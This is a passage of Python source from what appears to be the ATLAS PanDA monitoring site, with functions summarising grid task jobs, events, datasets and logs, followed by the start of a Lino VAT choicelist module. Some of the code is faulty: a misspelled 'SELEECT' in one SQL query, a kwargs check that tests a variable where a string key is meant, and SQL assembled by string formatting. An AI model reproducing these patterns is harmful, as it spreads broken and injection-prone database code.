for cat, is_remove in cat_to_remove.items():
if is_remove:
del pd[cat]
# add 'all' category to histograms
for pt, td in plots_data.items():
for pm, pd in td.items():
all_cat = {}
for cat, cd in pd.items():
for site, sd in cd.items():
if site not in all_cat:
all_cat[site] = []
all_cat[site].extend(sd)
pd['all'] = all_cat
# remove empty plots
plots_to_remove = []
for pt, td in plots_data.items():
for pm, pd in td.items():
if sum([len(site_data) for site, site_data in pd['all'].items()]) == 0:
plots_to_remove.append(pm)
for pm in plots_to_remove:
for pt, td in plots_data.items():
if pm in td:
del plots_data[pt][pm]
del plot_details[pm]
_logger.info("clean up plots data: {} sec".format(time.time() - start_time))
# prepare stack histogram data
for pname, pd in plot_details.items():
if pd['type'] == 'stack_bar':
plots_dict[pname] = {
'details': plot_details[pname],
'data': {},
}
for cat, cd in plots_data[pd['type']][pname].items():
n_decimals = 0
if 'per' in pname:
n_decimals = 2
stats, columns = build_stack_histogram(cd, n_decimals=n_decimals)
plots_dict[pname]['data'][cat] = {
'columns': columns,
'stats': stats,
}
elif pd['type'] == 'pie':
plots_dict[pname] = {
'details': plot_details[pname],
'data': {},
}
for cat, cd in plots_data[pd['type']][pname].items():
columns = []
for site in cd:
columns.append([site, sum(cd[site])])
plots_dict[pname]['data'][cat] = {
'columns': sorted(columns, key=lambda x: -x[1]),
}
if max([len(i['columns']) for i in plots_dict[pname]['data'].values()]) > 15:
plots_dict[pname]['details']['legend_position'] = 'bottom'
plots_dict[pname]['details']['size'] = [800, 300 + 20 * int(max([len(i['columns']) for i in plots_dict[pname]['data'].values()])/6)]
_logger.info("built plots: {} sec".format(time.time() - start_time))
# transform dict to list
plots_list = []
for pname, pdata in plots_dict.items():
plots_list.append({'name': pname, 'data': pdata})
return plots_list
def build_stack_histogram(data_raw, **kwargs):
"""
Prepare stack histogram data and calculate mean and std metrics
:param data_raw: dict of lists
:param kwargs:
:return:
"""
n_decimals = 0
if 'n_decimals' in kwargs:
n_decimals = kwargs['n_decimals']
N_BINS_MAX = 50
stats = []
columns = []
data_all = []
for site, sd in data_raw.items():
data_all.extend(sd)
stats.append(np.average(data_all) if not np.isnan(np.average(data_all)) else 0)
stats.append(np.std(data_all) if not np.isnan(np.std(data_all)) else 0)
bins_all, ranges_all = np.histogram(data_all, bins='auto')
if len(ranges_all) > N_BINS_MAX + 1:
bins_all, ranges_all = np.histogram(data_all, bins=N_BINS_MAX)
ranges_all = list(np.round(ranges_all, n_decimals))
x_axis_ticks = ['x']
x_axis_ticks.extend(ranges_all[:-1])
for stack_param, data in data_raw.items():
column = [stack_param]
column.extend(list(np.histogram(data, ranges_all)[0]))
# do not add if all the values are zeros
if sum(column[1:]) > 0:
columns.append(column)
# sort by biggest impact
columns = sorted(columns, key=lambda x: sum(x[1:]), reverse=True)
columns.insert(0, x_axis_ticks)
return stats, columns
def event_summary_for_task(mode, query, **kwargs):
"""
Event summary for a task.
If drop mode, we need a transaction key (tk_dj) to except job retries. If it is not provided we do it here.
:param mode: str (drop or nodrop)
:param query: dict
:return: eventslist: list of dict (number of events in different states)
"""
tk_dj = -1
if tk_dj in kwargs:
tk_dj = kwargs['tk_dj']
if mode == 'drop' and tk_dj == -1:
# inserting dropped jobs to tmp table
extra = '(1=1)'
extra, tk_dj = insert_dropped_jobs_to_tmp_table(query, extra)
eventservicestatelist = [
'ready', 'sent', 'running', 'finished', 'cancelled', 'discarded', 'done', 'failed', 'fatal', 'merged',
'corrupted'
]
eventslist = []
essummary = dict((key, 0) for key in eventservicestatelist)
print ('getting events states summary')
if mode == 'drop':
jeditaskid = query['jeditaskid']
# explicit time window for better searching over partitioned JOBSARCHIVED
time_field = 'modificationtime'
time_format = "YYYY-MM-DD HH24:MI:SS"
if 'creationdate__range' in query:
extra_str = " AND ( {} > TO_DATE('{}', '{}') AND {} < TO_DATE('{}', '{}') )".format(
time_field, query['creationdate__range'][0], time_format,
time_field, query['creationdate__range'][1], time_format)
else: # if no time range -> look in last 3 months
extra_str = 'AND {} > SYSDATE - 90'.format(time_field)
equerystr = """
SELECT
/*+ cardinality(tmp 10) INDEX_RS_ASC(ev JEDI_EVENTS_PK) NO_INDEX_FFS(ev JEDI_EVENTS_PK) NO_INDEX_SS(ev JEDI_EVENTS_PK) */
SUM(DEF_MAX_EVENTID-DEF_MIN_EVENTID+1) AS EVCOUNT,
ev.STATUS
FROM ATLAS_PANDA.JEDI_EVENTS ev,
(select ja4.pandaid from ATLAS_PANDA.JOBSARCHIVED4 ja4
where ja4.jeditaskid = :tid and ja4.eventservice is not NULL and ja4.eventservice != 2
and ja4.pandaid not in (select id from ATLAS_PANDABIGMON.TMP_IDS1DEBUG where TRANSACTIONKEY = :tkdj)
union
select ja.pandaid from ATLAS_PANDAARCH.JOBSARCHIVED ja
where ja.jeditaskid = :tid and ja.eventservice is not NULL and ja.eventservice != 2 {}
and ja.pandaid not in (select id from ATLAS_PANDABIGMON.TMP_IDS1DEBUG where TRANSACTIONKEY = :tkdj)
union
select jav4.pandaid from ATLAS_PANDA.jobsactive4 jav4
where jav4.jeditaskid = :tid and jav4.eventservice is not NULL and jav4.eventservice != 2
and jav4.pandaid not in (select id from ATLAS_PANDABIGMON.TMP_IDS1DEBUG where TRANSACTIONKEY = :tkdj)
union
select jw4.pandaid from ATLAS_PANDA.jobswaiting4 jw4
where jw4.jeditaskid = :tid and jw4.eventservice is not NULL and jw4.eventservice != 2
and jw4.pandaid not in (select id from ATLAS_PANDABIGMON.TMP_IDS1DEBUG where TRANSACTIONKEY = :tkdj)
union
select jd4.pandaid from ATLAS_PANDA.jobsdefined4 jd4
where jd4.jeditaskid = :tid and jd4.eventservice is not NULL and jd4.eventservice != 2
and jd4.pandaid not in (select id from ATLAS_PANDABIGMON.TMP_IDS1DEBUG where TRANSACTIONKEY = :tkdj)
) j
WHERE ev.PANDAID = j.pandaid AND ev.jeditaskid = :tid
GROUP BY ev.STATUS
""".format(extra_str)
new_cur = connection.cursor()
new_cur.execute(equerystr, {'tid': jeditaskid, 'tkdj': tk_dj})
evtable = dictfetchall(new_cur)
for ev in evtable:
essummary[eventservicestatelist[ev['STATUS']]] += ev['EVCOUNT']
if mode == 'nodrop':
event_counts = []
equery = {'jeditaskid': query['jeditaskid']}
event_counts.extend(
JediEvents.objects.filter(**equery).values('status').annotate(count=Count('status')).order_by('status'))
for state in event_counts:
essummary[eventservicestatelist[state['status']]] = state['count']
# creating ordered list of eventssummary
for state in eventservicestatelist:
eventstatus = {}
eventstatus['statusname'] = state
eventstatus['count'] = essummary[state]
eventslist.append(eventstatus)
return eventslist
def datasets_for_task(jeditaskid):
"""
Getting list of datasets corresponding to a task and file state summary
:param jeditaskid: int
:return: dsets: list of dicts
:return: dsinfo: dict
"""
dsets = []
dsinfo = {
'nfiles': 0,
'nfilesfinished': 0,
'nfilesfailed': 0,
'pctfinished': 0.0,
'pctfailed': 0,
'neventsTot': 0,
'neventsUsedTot': 0,
'neventsOutput': 0,
}
dsquery = {
'jeditaskid': jeditaskid,
}
values = (
'jeditaskid', 'datasetid', 'datasetname', 'containername', 'type', 'masterid', 'streamname', 'status',
'storagetoken', 'nevents', 'neventsused', 'neventstobeused', 'nfiles', 'nfilesfinished', 'nfilesfailed'
)
dsets.extend(JediDatasets.objects.filter(**dsquery).values(*values))
scope = ''
newdslist = []
if len(dsets) > 0:
for ds in dsets:
if len(ds['datasetname']) > 0:
if not str(ds['datasetname']).startswith('user'):
scope = str(ds['datasetname']).split('.')[0]
else:
scope = '.'.join(str(ds['datasetname']).split('.')[:2])
if ':' in scope:
scope = str(scope).split(':')[0]
ds['scope'] = scope
newdslist.append(ds)
# input primary datasets
if ds['type'] in ['input', 'pseudo_input'] and ds['masterid'] is None:
if not ds['nevents'] is None and int(ds['nevents']) > 0:
dsinfo['neventsTot'] += int(ds['nevents'])
if not ds['neventsused'] is None and int(ds['neventsused']) > 0:
dsinfo['neventsUsedTot'] += int(ds['neventsused'])
if int(ds['nfiles']) > 0:
ds['percentfinished'] = int(100. * int(ds['nfilesfinished']) / int(ds['nfiles']))
dsinfo['nfiles'] += int(ds['nfiles'])
dsinfo['nfilesfinished'] += int(ds['nfilesfinished'])
dsinfo['nfilesfailed'] += int(ds['nfilesfailed'])
elif ds['type'] in ('output', ):
dsinfo['neventsOutput'] += int(ds['nevents']) if ds['nevents'] and ds['nevents'] > 0 else 0
dsets = newdslist
dsets = sorted(dsets, key=lambda x: x['datasetname'].lower())
dsinfo['pctfinished'] = round(100.*dsinfo['nfilesfinished']/dsinfo['nfiles'], 2) if dsinfo['nfiles'] > 0 else 0
dsinfo['pctfailed'] = round(100.*dsinfo['nfilesfailed']/dsinfo['nfiles'], 2) if dsinfo['nfiles'] > 0 else 0
return dsets, dsinfo
def input_summary_for_task(taskrec, dsets):
"""
The function returns:
Input event chunks list for separate table
Input event chunks summary by states
A dictionary with tk as key and list of input files IDs that is needed for jobList view filter
"""
jeditaskid = taskrec['jeditaskid']
# Getting statuses of inputfiles
if datetime.strptime(taskrec['creationdate'], defaultDatetimeFormat) < \
datetime.strptime('2018-10-22 10:00:00', defaultDatetimeFormat):
ifsquery = """
select
ifs.jeditaskid,
ifs.datasetid,
ifs.fileid,
ifs.lfn,
ifs.startevent,
ifs.endevent,
ifs.attemptnr,
ifs.maxattempt,
ifs.failedattempt,
ifs.maxfailure,
case when cstatus not in ('running') then cstatus
when cstatus in ('running') and esmergestatus is null then cstatus
when cstatus in ('running') and esmergestatus = 'esmerge_transferring' then 'transferring'
when cstatus in ('running') and esmergestatus = 'esmerge_merging' then 'merging'
end as status
from (
select jdcf.jeditaskid, jdcf.datasetid, jdcf.fileid, jdcf.lfn, jdcf.startevent, jdcf.endevent,
jdcf.attemptnr, jdcf.maxattempt, jdcf.failedattempt, jdcf.maxfailure, jdcf.cstatus, f.esmergestatus, count(f.esmergestatus) as n
from
(select jd.jeditaskid, jd.datasetid, jdc.fileid,
jdc.lfn, jdc.startevent, jdc.endevent,
jdc.attemptnr, jdc.maxattempt, jdc.failedattempt, jdc.maxfailure,
case when (jdc.maxattempt <= jdc.attemptnr or jdc.failedattempt >= jdc.maxfailure) and jdc.status = 'ready' then 'failed' else jdc.status end as cstatus
from atlas_panda.jedi_dataset_contents jdc,
atlas_panda.jedi_datasets jd
where jd.datasetid = jdc.datasetid
and jd.jeditaskid = {}
and jd.masterid is NULL
and jdc.type in ( 'input', 'pseudo_input')
) jdcf
LEFT JOIN
(select f4.jeditaskid, f4.fileid, f4.datasetid, f4.pandaid,
case when ja4.jobstatus = 'transferring' and ja4.eventservice = 2 then 'esmerge_transferring' when ja4.eventservice = 2 then 'esmerge_merging' else null end as esmergestatus
from atlas_panda.filestable4 f4, ATLAS_PANDA.jobsactive4 ja4
where f4.pandaid = ja4.pandaid and f4.type in ( 'input', 'pseudo_input')
and f4.jeditaskid = {}
) f
on jdcf.datasetid = f.datasetid and jdcf.fileid = f.fileid
group by jdcf.jeditaskid, jdcf.datasetid, jdcf.fileid, jdcf.lfn, jdcf.startevent, jdcf.endevent,
jdcf.attemptnr, jdcf.maxattempt, jdcf.failedattempt, jdcf.maxfailure, jdcf.cstatus, f.esmergestatus
) ifs """.format(jeditaskid, jeditaskid)
cur = connection.cursor()
cur.execute(ifsquery)
inputfiles = cur.fetchall()
cur.close()
inputfiles_names = ['jeditaskid', 'datasetid', 'fileid', 'lfn', 'startevent', 'endevent', 'attemptnr',
'maxattempt', 'failedattempt', 'maxfailure', 'procstatus']
inputfiles_list = [dict(zip(inputfiles_names, row)) for row in inputfiles]
else:
ifsquery = {}
ifsquery['jeditaskid'] = jeditaskid
indsids = [ds['datasetid'] for ds in dsets if ds['type'] == 'input' and ds['masterid'] is None]
ifsquery['datasetid__in'] = indsids if len(indsids) > 0 else [-1,]
inputfiles_list = []
inputfiles_list.extend(JediDatasetContents.objects.filter(**ifsquery).values())
# counting of files in different states and building list of fileids for jobList
inputfiles_counts = {}
inputfilesids_states = {}
dsids = []
for inputfile in inputfiles_list:
if inputfile['procstatus'] not in inputfiles_counts:
inputfiles_counts[inputfile['procstatus']] = 0
if inputfile['procstatus'] not in inputfilesids_states:
inputfilesids_states[inputfile['procstatus']] = []
if inputfile['datasetid'] not in dsids:
dsids.append(inputfile['datasetid'])
inputfiles_counts[inputfile['procstatus']] += 1
inputfilesids_states[inputfile['procstatus']].append(inputfile['fileid'])
inputfiles_tk = {}
ifs_states = ['ready', 'queued', 'running', 'merging', 'transferring', 'finished', 'failed']
ifs_summary = []
for ifstate in ifs_states:
ifstatecount = 0
tk = random.randrange(100000000)
if ifstate in inputfiles_counts.keys():
ifstatecount = inputfiles_counts[ifstate]
inputfiles_tk[tk] = inputfilesids_states[ifstate]
ifs_summary.append({'name': ifstate, 'count': ifstatecount, 'tk': tk, 'ds': dsids})
return inputfiles_list, ifs_summary, inputfiles_tk
def job_summary_for_task_light(taskrec):
"""
Light version of jobSummary for ES tasks specifically. Nodrop mode by default. See ATLASPANDA-466 for details.
:param taskrec:
:return:
"""
jeditaskidstr = str(taskrec['jeditaskid'])
statelistlight = ['defined', 'assigned', 'activated', 'starting', 'running', 'holding', 'transferring', 'finished',
'failed', 'cancelled']
estypes = ['es', 'esmerge', 'jumbo', 'unknown']
# create structure and fill the dicts by 0 values
jobSummaryLight = {}
jobSummaryLightSplitted = {}
for state in statelistlight:
jobSummaryLight[str(state)] = 0
for estype in estypes:
jobSummaryLightSplitted[estype] = {}
for state in statelistlight:
jobSummaryLightSplitted[estype][str(state)] = 0
js_count_list = []
# decide which tables to query, if -1: only atlarc, 1: adcr, 0: both
task_archive_flag = get_task_time_archive_flag(get_task_timewindow(taskrec, format_out='datatime'))
if task_archive_flag >= 0:
jsquery = """
select jobstatus, case eventservice when 1 then 'es' when 5 then 'es' when 2 then 'esmerge' when 4 then 'jumbo' else 'unknown' end, count(pandaid) as njobs from (
(
select pandaid, es as eventservice, jobstatus from atlas_pandabigmon.combined_wait_act_def_arch4 where jeditaskid = :jtid
)
union all
(
select pandaid, eventservice, jobstatus from atlas_pandaarch.jobsarchived where jeditaskid = :jtid
minus
select pandaid, eventservice, jobstatus from atlas_pandaarch.jobsarchived where jeditaskid = :jtid and pandaid in (
select pandaid from atlas_pandabigmon.combined_wait_act_def_arch4 where jeditaskid = :jtid
)
)
)
group by jobstatus, eventservice
"""
cur = connection.cursor()
cur.execute(jsquery, {'jtid': jeditaskidstr})
js_count = cur.fetchall()
cur.close()
js_count_names = ['state', 'es', 'count']
js_count_list = [dict(zip(js_count_names, row)) for row in js_count]
# if old task go to ATLARC for jobs summary
if task_archive_flag <= 0:
js_count_raw_list = []
jquery = {
'jeditaskid': taskrec['jeditaskid'],
'modificationtime__castdate__range': get_task_timewindow(taskrec, format_out='str')
}
jobsarchived_models = get_pandajob_models_by_year(get_task_timewindow(taskrec, format_out='str'))
if len(jobsarchived_models) > 0:
for jam in jobsarchived_models:
js_count_raw_list.extend(jam.objects.filter(**jquery).values('eventservice', 'jobstatus').annotate(count=Count('pandaid')))
_logger.info("Got jobs summary from ATLARC")
if len(js_count_raw_list) > 0:
for row in js_count_raw_list:
tmp_dict = {
'state': row['jobstatus'],
'count': row['count'],
}
if row['eventservice']:
tmp_dict['es'] = const.EVENT_SERVICE_JOB_TYPES[row['eventservice']] if row['eventservice'] in const.EVENT_SERVICE_JOB_TYPES else 'unknown'
else:
tmp_dict['es'] = 'unknown'
js_count_list.append(tmp_dict)
for row in js_count_list:
if row['state'] in statelistlight:
if not (row['state'] == 'cancelled' and row['es'] in ('es', 'esmerge')):
jobSummaryLight[row['state']] += row['count']
if row['es'] in estypes and not (row['state'] == 'cancelled' and row['es'] in ('es', 'esmerge')):
jobSummaryLightSplitted[row['es']][row['state']] += row['count']
# delete 'unknown' if count = 0
if 'unknown' in jobSummaryLightSplitted and sum(v for v in jobSummaryLightSplitted['unknown'].values()) == 0:
try:
del jobSummaryLightSplitted['unknown']
except:
_logger.warning("Failed to delete empty unknown category in jobSummaryLightSplitted")
# dict -> list for template
jobsummarylight = [dict(name=state, count=jobSummaryLight[state]) for state in statelistlight]
jobsummarylightsplitted = {}
for estype, count_dict in jobSummaryLightSplitted.items():
jobsummarylightsplitted[estype] = [dict(name=state, count=count_dict[state]) for state in statelistlight]
return jobsummarylight, jobsummarylightsplitted
def get_top_memory_consumers(taskrec):
jeditaskidstr = str(taskrec['jeditaskid'])
topmemoryconsumedjobs = []
tmcquerystr = """
select jeditaskid, pandaid, computingsite, jobmaxpss, jobmaxpss_percore, sitemaxrss, sitemaxrss_percore, maxpssratio
from (
select j.jeditaskid, j.pandaid, j.computingsite, j.jobmaxpss, j.jobmaxpss_percore, s.maxrss as sitemaxrss,
s.maxrss/s.corecount as sitemaxrss_percore, j.jobmaxpss_percore/(s.maxrss/s.corecount) as maxpssratio,
row_number() over (partition by jeditaskid order by j.jobmaxpss_percore/(s.maxrss/s.corecount) desc) as jobrank
from atlas_pandameta.schedconfig s,
(select pandaid, jeditaskid, computingsite, maxpss/1000 as jobmaxpss, maxpss/1000/actualcorecount as jobmaxpss_percore
from ATLAS_PANDA.jobsarchived4
where jeditaskid = :jdtsid and maxrss is not null
union
select pandaid, jeditaskid, computingsite, maxpss/1000 as jobmaxpss, maxpss/1000/actualcorecount as jobmaxpss_percore
from ATLAS_PANDAARCH.jobsarchived
where jeditaskid = :jdtsid and maxrss is not null
) j
where j.computingsite = s.nickname
)
where jobrank <= 3
"""
try:
cur = connection.cursor()
cur.execute(tmcquerystr, {'jdtsid': jeditaskidstr})
tmc_list = cur.fetchall()
cur.close()
except:
tmc_list = []
tmc_names = ['jeditaskid', 'pandaid', 'computingsite', 'jobmaxrss', 'jobmaxpss_percore',
'sitemaxrss', 'sitemaxrss_percore', 'maxrssratio']
topmemoryconsumedjobs = [dict(zip(tmc_names, row)) for row in tmc_list]
for row in topmemoryconsumedjobs:
try:
row['maxrssratio'] = int(row['maxrssratio'])
except:
row['maxrssratio'] = 0
row['jobmaxpss_percore'] = round(row['jobmaxpss_percore']) if row['jobmaxpss_percore'] else 0
row['sitemaxrss_percore'] = round(row['sitemaxrss_percore']) if row['sitemaxrss_percore'] else 0
return topmemoryconsumedjobs
def get_job_state_summary_for_tasklist(tasks):
"""
Getting job state summary for list of tasks. Nodrop mode only
:return: taskJobStateSummary : dictionary
"""
taskids = [int(task['jeditaskid']) for task in tasks]
trans_key = insert_to_temp_table(taskids)
tmp_table = get_tmp_table_name()
jsquery = """
select jeditaskid, jobstatus, count(pandaid) as njobs from (
(
select jeditaskid, pandaid, jobstatus from atlas_pandabigmon.combined_wait_act_def_arch4
where jeditaskid in (select id from {0} where TRANSACTIONKEY = :tk )
)
union all
(
select jeditaskid, pandaid, jobstatus from atlas_pandaarch.jobsarchived
where jeditaskid in (select id from {0} where TRANSACTIONKEY = :tk )
minus
select jeditaskid, pandaid, jobstatus from atlas_pandaarch.jobsarchived
where jeditaskid in (select id from {0} where TRANSACTIONKEY = :tk )
and pandaid in (
select pandaid from atlas_pandabigmon.combined_wait_act_def_arch4
where jeditaskid in (select id from {0} where TRANSACTIONKEY = :tk )
)
)
)
group by jeditaskid, jobstatus
""".format(tmp_table)
cur = connection.cursor()
cur.execute(jsquery, {'tk': trans_key})
js_count_bytask = cur.fetchall()
cur.close()
js_count_bytask_names = ['jeditaskid', 'jobstatus', 'count']
js_count_bytask_list = [dict(zip(js_count_bytask_names, row)) for row in js_count_bytask]
# list -> dict
js_count_bytask_dict = {}
for row in js_count_bytask_list:
if row['jeditaskid'] not in js_count_bytask_dict:
js_count_bytask_dict[row['jeditaskid']] = {}
if row['jobstatus'] not in js_count_bytask_dict[row['jeditaskid']]:
js_count_bytask_dict[row['jeditaskid']][row['jobstatus']] = 0
js_count_bytask_dict[row['jeditaskid']][row['jobstatus']] += int(row['count'])
return js_count_bytask_dict
def get_task_params(jeditaskid):
"""
Extract task and job parameter lists from CLOB in Jedi_TaskParams table
:param jeditaskid: int
:return: taskparams: dict
:return: jobparams: list
"""
query = {'jeditaskid': jeditaskid}
taskparams = JediTaskparams.objects.filter(**query).values()
if len(taskparams) > 0:
taskparams = taskparams[0]['taskparams']
try:
taskparams = json.loads(taskparams)
except ValueError:
pass
return taskparams
def humanize_task_params(taskparams):
"""
Prepare list of params for template output
:param taskparams: dict
:return: taskparams_list, jobparams_list
"""
taskparams_list = []
jobparams_list = []
for k in taskparams:
rec = {'name': k, 'value': taskparams[k]}
taskparams_list.append(rec)
taskparams_list = sorted(taskparams_list, key=lambda x: x['name'].lower())
jobparams = taskparams['jobParameters']
if 'log' in taskparams:
jobparams.append(taskparams['log'])
for p in jobparams:
if p['type'] == 'constant':
ptxt = p['value']
elif p['type'] == 'template':
ptxt = "<i>{} template:</i> value='{}' ".format(p['param_type'], p['value'])
for v in p:
if v in ['type', 'param_type', 'value']:
continue
ptxt += " {}='{}'".format(v, p[v])
else:
ptxt = '<i>unknown parameter type {}:</i> '.format(p['type'])
for v in p:
if v in ['type', ]:
continue
ptxt += " {}='{}'".format(v, p[v])
jobparams_list.append(ptxt)
jobparams_list = sorted(jobparams_list, key=lambda x: x.lower())
return taskparams_list, jobparams_list
def get_hs06s_summary_for_task(query):
""""""
hs06sSum = {'finished': 0, 'failed': 0, 'total': 0}
hquery = copy.deepcopy(query)
hquery['jobstatus__in'] = ('finished', 'failed')
if 'jeditaskid' in hquery:
hs06sec_sum = []
pj_models = get_pandajob_models_by_year(query['modificationtime__castdate__range'])
for pjm in pj_models:
hs06sec_sum.extend(pjm.objects.filter(**hquery).values('jobstatus').annotate(hs06secsum=Sum('hs06sec')))
if len(hs06sec_sum) > 0:
for hs in hs06sec_sum:
if hs['jobstatus'] == 'finished':
hs06sSum['finished'] += hs['hs06secsum'] if hs['hs06secsum'] is not None else 0
hs06sSum['total'] += hs['hs06secsum'] if hs['hs06secsum'] is not None else 0
elif hs['jobstatus'] == 'failed':
hs06sSum['failed'] += hs['hs06secsum'] if hs['hs06secsum'] is not None else 0
hs06sSum['total'] += hs['hs06secsum'] if hs['hs06secsum'] is not None else 0
return hs06sSum
def get_task_age(task):
"""
:param task: dict of task params, creationtime is obligatory
:return: age in days or -1 if not enough data provided
"""
task_age = -1
if 'endtime' in task and task['endtime'] is not None:
endtime = parse_datetime(task['endtime']) if not isinstance(task['endtime'], datetime) else task['endtime']
else:
endtime = datetime.now()
if 'creationdate' in task and task['creationdate'] is not None:
creationtime = parse_datetime(task['creationdate']) if not isinstance(task['creationdate'], datetime) else task['creationdate']
else:
creationtime = None
if endtime and creationtime:
task_age = round((endtime-creationtime).total_seconds() / 60. / 60. / 24., 2)
return task_age
def get_task_timewindow(task, **kwargs):
"""
Return a list of two datetime when task run
:param task:
:return: timewindow: list of datetime or str
"""
format_out = 'datetime'
if 'format_out' in kwargs and kwargs['format_out'] == 'str':
format_out = 'str'
timewindow = [datetime.now(), datetime.now()]
if 'creationdate' in task and task['creationdate']:
timewindow[0] = task['creationdate'] if isinstance(task['creationdate'], datetime) else parse_datetime(task['creationdate'])
else:
timewindow[0] = datetime.now()
if task['status'] in const.TASK_STATES_FINAL:
if 'endtime' in task and task['endtime']:
timewindow[1] = task['endtime'] if isinstance(task['endtime'], datetime) else parse_datetime(task['endtime'])
elif 'modificationtime' in task and task['modificationtime']:
timewindow[1] = task['modificationtime'] if isinstance(task['modificationtime'], datetime) else parse_datetime(task['modificationtime'])
else:
timewindow[1] = datetime.now()
else:
timewindow[1] = datetime.now()
if format_out == 'str':
timewindow = [t.strftime(defaultDatetimeFormat) for t in timewindow]
return timewindow
def get_task_time_archive_flag(task_timewindow):
"""
Decide which tables query, if -1: only atlarc, 1: adcr, 0: both
:param timewindow: list of two datetime
:return: task_age_flag: -1, 0 or 1
"""
#
task_age_flag = 1
if task_timewindow[1] < datetime.now() - timedelta(days=365*3):
task_age_flag = -1
elif task_timewindow[0] > datetime.now() - timedelta(days=365*3) and task_timewindow[1] < datetime.now() - timedelta(days=365*2):
task_age_flag = 0
elif task_timewindow[0] > datetime.now() - timedelta(days=365*2):
task_age_flag = 1
return task_age_flag
def get_dataset_locality(jeditaskid):
"""
Getting RSEs for a task input datasets
:return:
"""
N_IN_MAX = 100
query = {}
extra_str = ' (1=1) '
if isinstance(jeditaskid, list) or isinstance(jeditaskid, tuple):
if len(jeditaskid) > N_IN_MAX:
trans_key = insert_to_temp_table(jeditaskid)
tmp_table = get_tmp_table_name()
extra_str += ' AND jeditaskid IN (SELEECT id FROM {} WHERE transactionkey = {} )'.format(tmp_table, trans_key)
else:
query['jeditaskid__in'] = jeditaskid
elif isinstance(jeditaskid, int):
query['jeditaskid'] = jeditaskid
rse_list = JediDatasetLocality.objects.filter(**query).extra(where=[extra_str]).values()
rse_dict = {}
if len(rse_list) > 0:
for item in rse_list:
if item['jeditaskid'] not in rse_dict:
rse_dict[item['jeditaskid']] = {}
if item['datasetid'] not in rse_dict[item['jeditaskid']]:
rse_dict[item['jeditaskid']][item['datasetid']] = []
rse_dict[item['jeditaskid']][item['datasetid']].append({'rse': item['rse'], 'timestamp': item['timestamp']})
return rse_dict
def get_prod_slice_by_taskid(jeditaskid):
jsquery = """
SELECT tasks.taskid, tasks.PR_ID, tasks.STEP_ID, datasets.SLICE from ATLAS_DEFT.T_PRODUCTION_TASK tasks
JOIN ATLAS_DEFT.T_PRODUCTION_STEP steps on tasks.step_id = steps.step_id
JOIN ATLAS_DEFT.T_INPUT_DATASET datasets ON datasets.IND_ID=steps.IND_ID
where tasks.taskid=:taskid
"""
cur = connection.cursor()
cur.execute(jsquery, {'taskid': jeditaskid})
task_prod_info = cur.fetchall()
cur.close()
slice = None
if task_prod_info:
slice = task_prod_info[0][3]
return slice
def get_logs_by_taskid(jeditaskid):
tasks_logs = []
connection = create_esatlas_connection()
s = Search(using=connection, index='atlas_jedilogs-*')
s = s.filter('term', **{'jediTaskID': jeditaskid})
s.aggs.bucket('logName', 'terms', field='logName.keyword', size=1000) \
.bucket('type', 'terms', field='fields.type.keyword') \
.bucket('logLevel', 'terms', field='logLevel.keyword')
response = s.execute()
for agg in response['aggregations']['logName']['buckets']:
for types in agg['type']['buckets']:
type = types['key']
for levelnames in types['logLevel']['buckets']:
levelname = levelnames['key']
tasks_logs.append({'jediTaskID': jeditaskid, 'logname': type, 'loglevel': levelname,
'lcount': str(levelnames['doc_count'])})
s = Search(using=connection, index='atlas_pandalogs-*')
s = s.filter('term', **{'jediTaskID': jeditaskid})
s.aggs.bucket('logName', 'terms', field='logName.keyword', size=1000) \
.bucket('type', 'terms', field='fields.type.keyword') \
.bucket('logLevel', 'terms', field='logLevel.keyword')
response = s.execute()
for agg in response['aggregations']['logName']['buckets']:
for types in agg['type']['buckets']:
type = types['key']
for levelnames in types['logLevel']['buckets']:
levelname = levelnames['key']
tasks_logs.append({'jediTaskID': jeditaskid, 'logname': type, 'loglevel': levelname,
'lcount': str(levelnames['doc_count'])})
return tasks_logs
|
apache-2.0
| 1,436,448,402,228,913,000 | 42.802091 | 193 | 0.579949 | false |
lino-framework/xl
|
lino_xl/lib/vat/choicelists.py
|
1
|
17924
|
# -*- coding: UTF-8 -*-
# Copyright 2012-2020 Rumma & Ko Ltd
# License: GNU Affero General Public License v3 (see file COPYING for details)
from lino.utils import is_string
from decimal import Decimal
from lino.api import dd, _, gettext
from etgen.html import E, forcetext
from django.db import models
from lino_xl.lib.ledger.roles import LedgerStaff
from lino_xl.lib.ledger.choicelists import DC, TradeTypes, CommonAccounts
from lino_xl.lib.ledger.utils import ZERO
class VatClasses(dd.ChoiceList):
verbose_name = _("VAT class")
verbose_name_plural = _("VAT classes")
required_roles = dd.login_required(LedgerStaff)
show_values = False
add = VatClasses.add_item
add('010', _("Goods at normal VAT rate"), 'goods') # everything else
add('020', _("Goods at reduced VAT rate"), 'reduced') # food, books,...
add('030', _("Goods exempt from VAT"), 'exempt') # post stamps, ...
add('100', _("Services"), 'services')
add('200', _("Investments"), 'investments')
add('210', _("Real estate"), 'real_estate')
add('220', _("Vehicles"), 'vehicles')
add('300', _("Operations without VAT"), 'vatless') # internal clearings, flight tickets, ...
class VatAreas(dd.ChoiceList):
verbose_name = _("VAT area")
verbose_name_plural = _("VAT areas")
required_roles = dd.login_required(LedgerStaff)
@classmethod
def get_for_country(cls, country=None):
if country is None:
isocode = dd.plugins.countries.country_code
else:
isocode = country.isocode
if isocode == dd.plugins.countries.country_code:
return cls.national
if isocode in dd.plugins.vat.eu_country_codes:
return cls.eu
return cls.international
add = VatAreas.add_item
add('10', _("National"), 'national')
add('20', _("EU"), 'eu')
add('30', _("International"), 'international')
class VatColumn(dd.Choice):
common_account = None
def __init__(self, value, text, common_account=None):
super(VatColumn, self).__init__(value, text)
self.common_account = common_account
class VatColumns(dd.ChoiceList):
# to be populated by bevat, bevats, ...
verbose_name = _("VAT column")
verbose_name_plural = _("VAT columns")
required_roles = dd.login_required(LedgerStaff)
show_values = True
item_class = VatColumn
column_names = "value text common_account account"
@dd.virtualfield(CommonAccounts.field())
def common_account(cls, col, ar):
return col.common_account
@dd.virtualfield(dd.ForeignKey('ledger.Account'))
def account(cls, col, ar):
if col.common_account is not None:
return col.common_account.get_object()
class VatRegime(dd.Choice):
vat_area = None
needs_vat_id = False
# item_vat = True # 20200521 no longer used
def __init__(self, value, text, name, vat_area=None, item_vat=True, needs_vat_id=False):
super(VatRegime, self).__init__(value, text, name)
self.vat_area = vat_area
self.needs_vat_id = needs_vat_id
# self.item_vat = item_vat
def is_allowed_for(self, vat_area):
if self.vat_area is None:
return True
return self.vat_area == vat_area
class VatRegimes(dd.ChoiceList):
verbose_name = _("VAT regime")
verbose_name_plural = _("VAT regimes")
column_names = "value name text vat_area needs_vat_id #item_vat"
item_class = VatRegime
